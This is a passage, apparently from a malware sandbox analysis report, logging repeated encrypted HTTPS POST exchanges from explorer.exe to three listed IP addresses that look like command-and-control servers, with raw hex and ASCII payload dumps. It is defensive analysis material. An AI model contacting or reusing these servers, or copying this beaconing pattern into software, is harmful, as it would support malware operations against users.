                                                                              2024-07-27 12:54:24 UTC1267OUTData Raw: 4c 63 64 51 6d 6c 52 45 4d 54 68 4a 4c 77 53 56 79 52 75 54 4b 72 67 49 44 77 65 76 53 70 31 76 33 77 2f 63 53 6b 54 31 47 30 57 32 79 35 46 37 65 53 78 52 44 41 31 6f 78 43 58 77 43 4f 2b 75 6a 6e 67 34 68 45 57 75 4b 55 2b 68 43 6c 55 48 69 78 6b 59 41 2b 43 4e 72 7a 2f 30 64 53 53 42 34 59 37 48 65 42 50 33 6a 46 4a 31 66 33 73 34 44 7a 6c 48 36 48 49 57 36 6b 2b 4c 72 79 56 74 75 6b 79 48 62 47 48 48 2f 43 41 58 74 66 7a 61 70 53 46 71 64 55 6e 76 73 48 38 30 73 37 55 64 54 53 72 6c 33 67 61 74 45 36 66 59 58 4b 37 53 58 68 32 48 4a 73 5a 45 69 67 7a 6a 42 53 6e 4a 56 4b 7a 6e 69 79 76 6d 44 72 65 67 74 56 75 54 7a 4b 74 33 43 33 48 57 39 62 79 6c 50 77 79 30 68 6f 6e 55 68 72 68 74 77 69 6f 4e 4a 73 79 70 72 6b 69 4a 74 38 55 42 42 71 79 6b 79 33 71
                                                                              Data Ascii: LcdQmlREMThJLwSVyRuTKrgIDwevSp1v3w/cSkT1G0W2y5F7eSxRDA1oxCXwCO+ujng4hEWuKU+hClUHixkYA+CNrz/0dSSB4Y7HeBP3jFJ1f3s4DzlH6HIW6k+LryVtukyHbGHH/CAXtfzapSFqdUnvsH80s7UdTSrl3gatE6fYXK7SXh2HJsZEigzjBSnJVKzniyvmDregtVuTzKt3C3HW9bylPwy0honUhrhtwioNJsyprkiJt8UBBqyky3q
                                                                              2024-07-27 12:54:25 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:25 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:25 UTC685INData Raw: 71 6e 52 37 4b 35 32 35 79 6d 57 7a 79 79 78 37 50 52 61 39 4d 66 53 30 38 4c 39 73 59 77 44 38 52 55 55 62 53 46 72 37 34 52 46 4d 58 78 55 4a 66 6f 39 69 72 52 6b 37 39 43 6b 43 6a 65 64 33 52 48 55 75 4b 63 59 44 78 69 61 66 31 39 37 6c 38 6b 71 79 75 34 44 39 4a 69 4e 53 56 51 47 2b 61 47 54 64 6a 4f 72 71 4c 31 6b 47 4d 64 41 67 43 69 58 36 5a 7a 30 44 30 51 4b 38 35 2f 38 54 67 45 42 56 42 6a 4e 70 34 6d 4a 77 52 70 72 46 73 6c 4e 32 46 44 6a 78 53 55 57 6d 49 63 37 43 69 36 43 6f 64 4b 4a 36 49 6c 6e 4b 4b 58 54 45 6f 41 74 50 78 72 74 33 5a 77 42 44 45 6e 36 6e 61 35 71 74 36 35 75 6d 34 73 36 56 47 77 4b 61 67 5a 4c 2f 35 7a 6d 6b 5a 56 49 4a 75 41 58 32 6e 6c 5a 48 5a 66 62 58 72 35 62 5a 6f 64 62 72 68 79 65 58 72 59 37 6e 58 4d 55 78 6f 63 6e
                                                                              Data Ascii: qnR7K525ymWzyyx7PRa9MfS08L9sYwD8RUUbSFr74RFMXxUJfo9irRk79CkCjed3RHUuKcYDxiaf197l8kqyu4D9JiNSVQG+aGTdjOrqL1kGMdAgCiX6Zz0D0QK85/8TgEBVBjNp4mJwRprFslN2FDjxSUWmIc7Ci6CodKJ6IlnKKXTEoAtPxrt3ZwBDEn6na5qt65um4s6VGwKagZL/5zmkZVIJuAX2nlZHZfbXr5bZodbrhyeXrY7nXMUxocn


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.449815107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:25 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:25 UTC1122OUTData Raw: 4c 45 49 71 51 34 75 64 47 4e 71 31 38 77 77 55 6c 35 36 57 31 62 69 68 63 35 6a 70 67 2b 50 4a 48 58 46 4b 6f 50 63 56 4d 41 4d 36 58 77 48 2b 74 38 7a 2b 6d 54 58 31 70 70 32 4e 47 77 2b 49 37 4d 79 6a 34 50 61 52 54 48 4b 79 42 6e 6e 68 37 6b 4b 72 76 30 72 4b 69 72 6f 4a 57 71 4b 72 4d 5a 6e 5a 37 58 38 79 5a 4f 67 63 43 79 55 49 53 56 57 65 2b 2f 46 6c 44 55 6f 55 51 71 68 75 76 64 42 51 51 42 63 50 57 6d 73 57 39 7a 57 66 7a 53 4f 4c 6f 64 53 4c 6e 5a 54 75 35 5a 7a 2f 2b 6a 31 72 41 57 58 75 78 33 59 72 6e 61 6b 66 67 73 44 56 36 54 46 78 37 62 35 50 30 76 5a 72 59 6e 2f 50 36 6a 70 42 76 61 49 6c 6c 78 52 33 46 74 39 6b 45 53 67 68 46 77 41 61 2b 4f 69 4c 44 74 4d 76 73 59 6a 69 46 38 39 4a 47 61 71 56 38 41 62 46 68 43 4e 41 2f 78 4f 59 4f 55 50
                                                                              Data Ascii: LEIqQ4udGNq18wwUl56W1bihc5jpg+PJHXFKoPcVMAM6XwH+t8z+mTX1pp2NGw+I7Myj4PaRTHKyBnnh7kKrv0rKiroJWqKrMZnZ7X8yZOgcCyUISVWe+/FlDUoUQqhuvdBQQBcPWmsW9zWfzSOLodSLnZTu5Zz/+j1rAWXux3YrnakfgsDV6TFx7b5P0vZrYn/P6jpBvaIllxR3Ft9kESghFwAa+OiLDtMvsYjiF89JGaqV8AbFhCNA/xOYOUP
                                                                              2024-07-27 12:54:27 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:27 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:27 UTC685INData Raw: 69 47 41 6f 4e 6b 67 58 65 59 71 6c 33 37 4b 70 79 57 79 75 76 6b 57 52 37 44 77 6b 4b 4a 7a 32 67 31 6d 55 75 56 6e 71 63 31 56 49 39 63 42 70 45 63 51 4c 2f 49 33 4d 7a 31 50 63 4d 6e 2f 79 6a 78 58 45 57 62 68 59 35 61 44 6b 2f 64 61 6e 36 4b 43 54 5a 4c 77 43 46 72 31 31 4a 38 35 31 70 45 62 6c 53 71 39 6f 49 74 55 43 52 6e 41 34 34 36 75 56 4a 59 70 5a 4d 4f 68 68 6e 56 70 39 2f 74 54 4e 31 4a 55 31 79 43 47 76 33 6a 63 4f 57 78 6d 65 55 4a 7a 66 74 65 58 5a 59 42 59 6b 52 5a 6d 61 38 2f 2b 33 79 74 46 6a 31 30 34 69 63 31 73 4e 63 52 49 65 58 35 70 5a 67 50 38 66 6a 45 49 47 67 54 4a 36 44 58 48 79 39 72 4a 2f 5a 71 76 73 49 4d 33 4a 70 42 41 7a 49 76 7a 38 42 53 76 65 4a 4f 4d 50 33 68 56 31 7a 33 4e 45 4d 37 36 54 74 33 48 4e 75 65 75 69 79 71 4e
                                                                              Data Ascii: iGAoNkgXeYql37KpyWyuvkWR7DwkKJz2g1mUuVnqc1VI9cBpEcQL/I3Mz1PcMn/yjxXEWbhY5aDk/dan6KCTZLwCFr11J851pEblSq9oItUCRnA446uVJYpZMOhhnVp9/tTN1JU1yCGv3jcOWxmeUJzfteXZYBYkRZma8/+3ytFj104ic1sNcRIeX5pZgP8fjEIGgTJ6DXHy9rJ/ZqvsIM3JpBAzIvz8BSveJOMP3hV1z3NEM76Tt3HNueuiyqN


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.449816167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:28 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:28 UTC1122OUTData Raw: 58 35 35 52 4b 49 42 45 66 62 4f 4c 79 58 65 35 4f 63 2b 6e 48 63 65 4b 4b 65 6a 71 6f 72 39 55 6e 42 2b 57 73 75 37 57 6e 73 30 69 47 6f 4a 57 69 4a 33 6a 75 66 37 70 75 66 34 79 72 5a 39 78 71 31 6c 61 37 4b 34 41 51 34 59 2b 4f 4c 78 73 41 66 45 71 50 76 51 48 59 69 53 4c 7a 33 79 63 36 31 31 79 59 4a 2b 2b 6a 77 4b 38 30 34 64 67 77 45 70 53 65 49 4c 6a 75 56 32 34 6e 63 31 44 43 6d 67 4c 78 6f 42 65 7a 43 55 2b 48 56 6f 70 4d 79 35 72 55 74 50 72 58 79 45 6f 73 2b 6d 37 61 50 4d 64 6a 73 2f 6e 7a 79 77 78 76 30 2b 31 42 70 79 63 4e 39 42 4b 7a 68 69 56 58 74 57 6e 35 50 2f 4b 55 34 4c 4d 53 50 57 38 77 64 4b 59 43 5a 77 36 38 52 57 57 57 70 77 6d 56 54 77 74 2f 6b 36 35 79 76 37 71 74 66 63 69 6c 37 4d 4c 76 35 6d 54 59 5a 57 57 2b 69 41 42 63 50 4a
                                                                              Data Ascii: X55RKIBEfbOLyXe5Oc+nHceKKejqor9UnB+Wsu7Wns0iGoJWiJ3juf7puf4yrZ9xq1la7K4AQ4Y+OLxsAfEqPvQHYiSLz3yc611yYJ++jwK804dgwEpSeILjuV24nc1DCmgLxoBezCU+HVopMy5rUtPrXyEos+m7aPMdjs/nzywxv0+1BpycN9BKzhiVXtWn5P/KU4LMSPW8wdKYCZw68RWWWpwmVTwt/k65yv7qtfcil7MLv5mTYZWW+iABcPJ
                                                                              2024-07-27 12:54:29 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:28 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:29 UTC685INData Raw: 75 6b 69 5a 6b 67 74 42 78 79 35 51 51 6d 54 75 79 68 33 32 75 56 47 38 41 51 64 4c 43 78 64 43 30 35 67 63 4b 77 62 52 39 70 36 6f 34 6d 75 68 44 55 48 46 41 6f 50 42 39 68 6a 75 2b 48 53 4b 4e 35 48 52 76 54 57 62 45 48 55 4a 6b 79 50 76 75 71 65 6d 4b 4e 68 42 56 49 70 36 33 4e 70 45 52 74 36 47 42 55 72 35 4f 56 4d 4f 56 30 41 5a 64 70 66 4a 41 4a 56 2f 38 52 73 46 63 37 63 52 47 53 2b 35 44 70 64 52 56 6b 68 61 37 6c 58 34 39 54 64 77 58 5a 49 50 4c 36 64 35 4f 46 51 66 71 43 48 74 71 66 2b 55 43 59 31 4b 66 34 44 55 31 58 6d 2f 58 48 50 57 66 66 37 52 63 7a 4d 2f 6f 31 6d 4f 6e 5a 47 33 49 36 47 59 47 76 42 65 78 6e 59 43 31 4d 45 2b 6c 31 48 54 4f 59 6a 6c 64 42 54 2f 71 6d 70 76 32 78 47 4f 37 43 77 56 4b 6d 46 50 4f 42 51 31 6f 38 45 57 42 65 6a
                                                                              Data Ascii: ukiZkgtBxy5QQmTuyh32uVG8AQdLCxdC05gcKwbR9p6o4muhDUHFAoPB9hju+HSKN5HRvTWbEHUJkyPvuqemKNhBVIp63NpERt6GBUr5OVMOV0AZdpfJAJV/8RsFc7cRGS+5DpdRVkha7lX49TdwXZIPL6d5OFQfqCHtqf+UCY1Kf4DU1Xm/XHPWff7RczM/o1mOnZG3I6GYGvBexnYC1ME+l1HTOYjldBT/qmpv2xGO7CwVKmFPOBQ1o8EWBej


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.449817107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:29 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:29 UTC1122OUTData Raw: 6d 48 49 37 4a 38 46 67 38 6c 35 35 4c 4e 4f 4b 63 45 4d 48 34 65 42 49 63 42 6a 55 31 4f 68 41 38 52 68 31 49 2f 63 42 56 30 45 47 4d 49 66 5a 68 57 4c 2b 7a 59 71 39 7a 32 6b 6b 42 66 53 30 31 6f 5a 32 2f 62 57 2b 47 6c 51 44 58 77 65 61 68 6e 50 49 6e 63 33 59 64 61 56 6d 79 74 37 38 36 75 4c 47 4e 44 53 6a 59 58 68 35 65 6b 44 66 6d 34 37 4f 52 4f 76 35 42 68 30 48 43 76 64 47 6c 65 55 59 53 6a 2b 6e 31 6b 49 55 39 4f 4a 54 57 68 66 62 34 72 53 76 2f 71 69 49 67 4a 69 57 43 42 58 53 36 73 42 31 61 56 51 74 4d 77 53 32 63 34 76 77 58 50 75 39 55 37 68 5a 53 75 6c 45 33 36 4a 64 2f 46 4c 6a 43 63 4a 4f 76 4c 69 63 45 4c 5a 70 32 32 6b 6e 76 47 53 57 50 43 55 57 66 67 42 79 79 63 75 2f 42 58 52 77 74 36 55 66 71 56 67 32 49 63 71 61 46 2f 55 46 64 54 2b
                                                                              Data Ascii: mHI7J8Fg8l55LNOKcEMH4eBIcBjU1OhA8Rh1I/cBV0EGMIfZhWL+zYq9z2kkBfS01oZ2/bW+GlQDXweahnPInc3YdaVmyt786uLGNDSjYXh5ekDfm47OROv5Bh0HCvdGleUYSj+n1kIU9OJTWhfb4rSv/qiIgJiWCBXS6sB1aVQtMwS2c4vwXPu9U7hZSulE36Jd/FLjCcJOvLicELZp22knvGSWPCUWfgByycu/BXRwt6UfqVg2IcqaF/UFdT+
                                                                              2024-07-27 12:54:31 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:31 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:31 UTC685INData Raw: 6d 70 61 39 6f 47 39 32 43 50 36 4f 49 59 5a 2b 57 4e 48 79 79 56 2b 45 2f 6a 45 53 41 45 48 6a 34 6e 37 55 34 78 59 42 58 44 45 70 4f 74 34 67 4a 55 59 62 6f 55 73 65 37 6d 39 4f 53 77 69 45 6c 4e 75 48 44 46 49 6d 4d 63 76 65 50 78 6e 43 6b 32 75 43 4c 54 64 67 70 6d 46 48 2b 68 39 56 44 73 6d 75 48 35 69 37 6c 2b 55 55 79 75 31 47 58 41 4a 4d 70 4e 31 4f 4e 43 70 4a 6f 78 7a 5a 68 66 69 53 38 31 62 70 6a 77 49 69 33 55 6e 64 4f 38 31 62 30 31 62 75 6b 48 79 30 50 70 62 53 55 62 46 74 31 56 64 79 47 64 71 59 78 44 42 4e 43 57 41 31 4d 58 43 44 63 75 69 37 36 63 50 6e 52 4d 63 72 55 4f 68 73 53 49 51 2b 2b 6b 73 62 6c 68 46 72 79 73 37 6e 51 74 48 4f 50 57 72 55 75 46 69 37 6f 47 67 50 49 57 6d 61 79 31 49 4c 69 58 2f 45 34 30 47 56 46 72 49 44 33 55 72
                                                                              Data Ascii: mpa9oG92CP6OIYZ+WNHyyV+E/jESAEHj4n7U4xYBXDEpOt4gJUYboUse7m9OSwiElNuHDFImMcvePxnCk2uCLTdgpmFH+h9VDsmuH5i7l+UUyu1GXAJMpN1ONCpJoxzZhfiS81bpjwIi3UndO81b01bukHy0PpbSUbFt1VdyGdqYxDBNCWA1MXCDcui76cPnRMcrUOhsSIQ++ksblhFrys7nQtHOPWrUuFi7oGgPIWmay1ILiX/E40GVFrID3Ur


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.449818107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:31 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:31 UTC1122OUTData Raw: 6f 6a 67 79 43 75 72 53 53 30 6f 32 76 6e 46 70 4e 65 62 6c 6d 48 49 57 53 6e 58 50 56 6b 70 73 6d 46 63 59 72 57 64 4b 55 77 50 4a 4f 55 33 6b 4c 39 44 48 46 7a 57 4a 4f 4d 53 77 54 32 61 58 54 4e 6c 42 78 59 48 61 58 6b 61 48 57 77 37 51 4e 6c 30 4e 77 41 74 76 37 49 41 39 5a 4f 50 68 69 74 67 42 42 2f 31 73 75 44 6b 62 38 4c 66 43 58 78 30 6e 52 52 69 49 4f 71 46 43 53 56 70 59 56 36 61 71 75 6f 4c 6a 45 58 6a 46 67 4f 55 42 62 4b 2b 47 2b 53 37 41 7a 74 6b 67 74 78 36 4b 64 53 69 68 5a 2f 53 31 66 2b 45 79 45 77 57 45 53 59 34 35 2f 41 65 49 35 52 6b 48 75 4f 5a 62 31 4d 67 2b 44 72 51 4f 42 36 64 74 6b 38 73 57 6a 4f 6a 70 53 67 54 51 6c 73 35 6c 73 4e 51 65 7a 75 6d 43 56 63 64 52 30 46 2b 69 2b 2f 7a 77 6d 43 6b 52 53 77 6a 64 43 7a 38 56 36 34 69
                                                                              Data Ascii: ojgyCurSS0o2vnFpNeblmHIWSnXPVkpsmFcYrWdKUwPJOU3kL9DHFzWJOMSwT2aXTNlBxYHaXkaHWw7QNl0NwAtv7IA9ZOPhitgBB/1suDkb8LfCXx0nRRiIOqFCSVpYV6aquoLjEXjFgOUBbK+G+S7Aztkgtx6KdSihZ/S1f+EyEwWESY45/AeI5RkHuOZb1Mg+DrQOB6dtk8sWjOjpSgTQls5lsNQezumCVcdR0F+i+/zwmCkRSwjdCz8V64i
                                                                              2024-07-27 12:54:33 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:33 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:33 UTC685INData Raw: 73 75 30 69 33 55 41 6f 6d 36 61 33 50 55 58 6a 51 48 6c 67 4e 49 42 4f 64 45 76 43 55 32 52 49 32 59 2f 38 62 51 37 63 70 52 65 33 42 7a 68 66 63 43 53 62 6e 46 2b 38 4a 77 45 68 43 6b 76 4d 63 6b 59 66 66 71 30 74 74 72 6c 6b 58 59 74 56 5a 42 6b 2f 58 53 4b 79 79 79 4a 4b 44 6e 38 72 4d 4b 37 51 4e 6c 42 44 4d 4e 70 39 63 53 43 53 63 69 79 45 34 48 6f 6c 73 39 4e 56 51 4a 57 75 4b 50 53 75 56 6a 66 51 6d 64 75 56 30 4b 66 6e 42 2b 4a 45 65 76 36 69 30 64 37 4f 2f 46 34 51 32 2f 5a 54 66 46 38 55 74 2f 33 66 71 53 4b 71 2f 61 4d 77 65 56 41 59 58 50 43 4a 6b 4e 50 4c 61 54 53 46 48 41 44 76 32 58 70 54 2f 47 70 4b 2f 73 7a 47 65 4a 44 52 74 66 6a 69 37 6e 68 79 72 55 4a 63 4f 6b 31 52 45 65 39 77 6a 4b 79 6e 49 6c 73 53 51 6c 69 6b 49 59 4d 56 6a 53 2b
                                                                              Data Ascii: su0i3UAom6a3PUXjQHlgNIBOdEvCU2RI2Y/8bQ7cpRe3BzhfcCSbnF+8JwEhCkvMckYffq0ttrlkXYtVZBk/XSKyyyJKDn8rMK7QNlBDMNp9cSCSciyE4Hols9NVQJWuKPSuVjfQmduV0KfnB+JEev6i0d7O/F4Q2/ZTfF8Ut/3fqSKq/aMweVAYXPCJkNPLaTSFHADv2XpT/GpK/szGeJDRtfji7nhyrUJcOk1REe9wjKynIlsSQlikIYMVjS+


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.449820167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:34 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:34 UTC1122OUTData Raw: 41 41 46 6a 4d 61 35 61 56 70 72 55 67 44 63 72 77 36 4f 61 52 38 76 54 63 71 52 2b 53 76 71 48 2b 35 6a 6b 50 52 64 59 72 74 61 55 6e 67 47 5a 46 76 52 53 6b 68 42 43 66 6e 64 46 66 30 4c 54 64 2b 35 43 55 74 79 76 44 2f 6f 2b 49 4a 39 67 72 66 74 7a 67 74 59 42 77 6d 6a 70 4a 58 44 35 4b 53 45 55 4a 74 4c 64 78 4f 63 64 73 56 33 6d 43 4f 59 75 35 42 66 2f 7a 6d 61 7a 4c 68 49 41 30 76 38 41 33 6d 4e 37 35 48 52 76 69 79 6a 45 73 33 46 58 35 7a 38 39 76 6f 59 36 6c 53 42 43 66 33 59 79 42 45 63 32 69 79 6b 42 37 39 7a 35 75 79 68 6c 51 77 61 6c 61 70 74 32 69 56 52 79 74 77 64 6b 74 75 51 71 50 4f 46 42 6a 37 69 79 41 4d 50 6d 64 4e 53 38 43 37 51 59 63 7a 6a 65 39 2f 77 54 65 33 36 55 57 43 57 70 45 59 37 53 37 6a 73 56 52 6e 58 65 35 37 69 6e 67 72 31
                                                                              Data Ascii: AAFjMa5aVprUgDcrw6OaR8vTcqR+SvqH+5jkPRdYrtaUngGZFvRSkhBCfndFf0LTd+5CUtyvD/o+IJ9grftzgtYBwmjpJXD5KSEUJtLdxOcdsV3mCOYu5Bf/zmazLhIA0v8A3mN75HRviyjEs3FX5z89voY6lSBCf3YyBEc2iykB79z5uyhlQwalapt2iVRytwdktuQqPOFBj7iyAMPmdNS8C7QYczje9/wTe36UWCWpEY7S7jsVRnXe57ingr1
                                                                              2024-07-27 12:54:35 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:34 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:35 UTC685INData Raw: 58 67 32 62 66 34 61 63 4a 39 37 65 61 77 67 46 6e 30 33 72 76 4e 31 43 4a 74 48 65 6a 69 38 6e 50 61 74 32 70 56 77 55 65 64 6c 31 59 4d 46 77 50 76 49 44 53 48 32 76 4f 50 54 32 33 56 6b 36 41 55 72 32 30 61 6c 4b 4c 47 66 56 42 4a 50 44 64 43 55 79 54 6a 78 39 44 64 2f 79 66 42 30 54 4d 65 56 6d 4b 67 79 57 68 38 72 4c 74 68 4a 56 31 42 4b 67 38 75 64 31 4d 39 64 66 64 4b 4e 66 6c 7a 7a 55 4a 6c 49 4d 34 38 2f 64 6e 44 71 68 32 43 6c 4c 7a 44 36 58 41 4f 76 31 4d 7a 57 31 4a 7a 4e 55 77 4c 4d 56 35 48 68 4b 6d 6e 41 46 4f 61 63 4e 48 4d 69 49 7a 75 66 31 65 4b 76 65 39 49 6b 35 6b 72 67 33 7a 4f 75 75 66 69 6e 4f 43 78 53 65 69 33 65 69 6e 36 76 6e 4a 2f 30 68 6c 2f 79 2b 71 67 54 41 58 2f 39 43 56 35 2b 47 48 31 6f 37 39 38 58 73 68 57 61 4c 67 70 62
                                                                              Data Ascii: Xg2bf4acJ97eawgFn03rvN1CJtHeji8nPat2pVwUedl1YMFwPvIDSH2vOPT23Vk6AUr20alKLGfVBJPDdCUyTjx9Dd/yfB0TMeVmKgyWh8rLthJV1BKg8ud1M9dfdKNflzzUJlIM48/dnDqh2ClLzD6XAOv1MzW1JzNUwLMV5HhKmnAFOacNHMiIzuf1eKve9Ik5krg3zOuufinOCxSei3ein6vnJ/0hl/y+qgTAX/9CV5+GH1o798XshWaLgpb


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.449821107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:35 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:35 UTC1122OUTData Raw: 4f 62 7a 30 59 71 32 72 43 76 35 73 6c 61 6e 38 54 70 53 5a 6c 62 48 6c 2b 62 76 72 65 59 59 72 74 35 39 34 34 41 54 53 63 34 42 7a 72 6c 34 2b 48 36 7a 5a 4f 30 47 5a 73 4d 5a 31 43 56 74 31 43 48 56 65 59 53 36 62 77 69 61 31 68 72 74 6b 6f 53 42 30 6b 35 58 42 39 42 69 35 59 37 45 6e 6d 4c 7a 2b 63 32 6d 73 76 34 79 69 4f 72 6b 61 74 33 76 6c 73 5a 56 61 32 6b 79 36 6c 46 70 6f 54 64 75 30 62 52 51 38 49 66 53 74 76 72 68 39 49 64 54 74 61 5a 68 66 6f 6f 57 2b 6d 4e 39 45 34 38 30 75 6e 50 30 43 45 48 39 47 52 69 70 62 37 68 34 71 69 37 48 32 7a 57 35 66 6f 76 2f 73 43 6a 48 45 67 77 78 4e 77 2f 78 6b 70 59 72 79 39 71 48 62 31 75 65 6f 34 4e 66 61 6a 50 79 38 39 55 33 6c 34 73 38 4a 70 70 69 6c 61 70 47 75 55 76 4c 6d 31 41 67 70 67 36 6e 69 33 42 43
                                                                              Data Ascii: Obz0Yq2rCv5slan8TpSZlbHl+bvreYYrt5944ATSc4Bzrl4+H6zZO0GZsMZ1CVt1CHVeYS6bwia1hrtkoSB0k5XB9Bi5Y7EnmLz+c2msv4yiOrkat3vlsZVa2ky6lFpoTdu0bRQ8IfStvrh9IdTtaZhfooW+mN9E480unP0CEH9GRipb7h4qi7H2zW5fov/sCjHEgwxNw/xkpYry9qHb1ueo4NfajPy89U3l4s8JppilapGuUvLm1Agpg6ni3BC
                                                                              2024-07-27 12:54:37 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:37 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:37 UTC685INData Raw: 4d 72 30 67 41 66 32 2b 32 37 78 2f 52 77 34 68 62 65 64 2b 51 63 4f 36 6b 64 79 5a 76 50 41 2f 7a 36 71 75 34 59 50 48 5a 59 34 38 41 77 4b 66 35 2f 76 43 38 44 7a 4f 47 4b 5a 6a 55 46 54 65 47 69 38 52 61 79 53 6c 6f 65 49 6b 32 67 30 32 50 73 33 2b 75 34 6c 4d 7a 34 65 39 61 6b 53 70 66 37 62 50 7a 6b 36 4a 4d 2f 2f 48 68 68 54 65 78 4e 37 74 36 78 45 49 56 46 59 41 76 34 49 55 4b 48 36 59 79 74 52 76 35 38 71 39 65 51 53 53 30 6f 73 48 44 6b 2f 69 43 33 54 74 6f 31 59 6a 31 76 61 4d 6d 7a 64 43 62 75 2f 4e 47 48 41 31 43 5a 6a 61 43 48 34 77 41 67 42 67 75 30 78 46 2b 61 67 6c 56 36 33 6c 54 38 67 77 43 42 4d 63 74 5a 75 44 55 4a 43 4e 68 32 68 77 75 70 33 38 37 35 43 4d 38 66 63 4f 58 5a 4f 46 65 78 37 55 6c 33 56 43 2b 56 31 32 4b 6c 31 70 4e 78 6a
                                                                              Data Ascii: Mr0gAf2+27x/Rw4hbed+QcO6kdyZvPA/z6qu4YPHZY48AwKf5/vC8DzOGKZjUFTeGi8RaySloeIk2g02Ps3+u4lMz4e9akSpf7bPzk6JM//HhhTexN7t6xEIVFYAv4IUKH6YytRv58q9eQSS0osHDk/iC3Tto1Yj1vaMmzdCbu/NGHA1CZjaCH4wAgBgu0xF+aglV63lT8gwCBMctZuDUJCNh2hwup3875CM8fcOXZOFex7Ul3VC+V12Kl1pNxj


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.449822107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:37 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
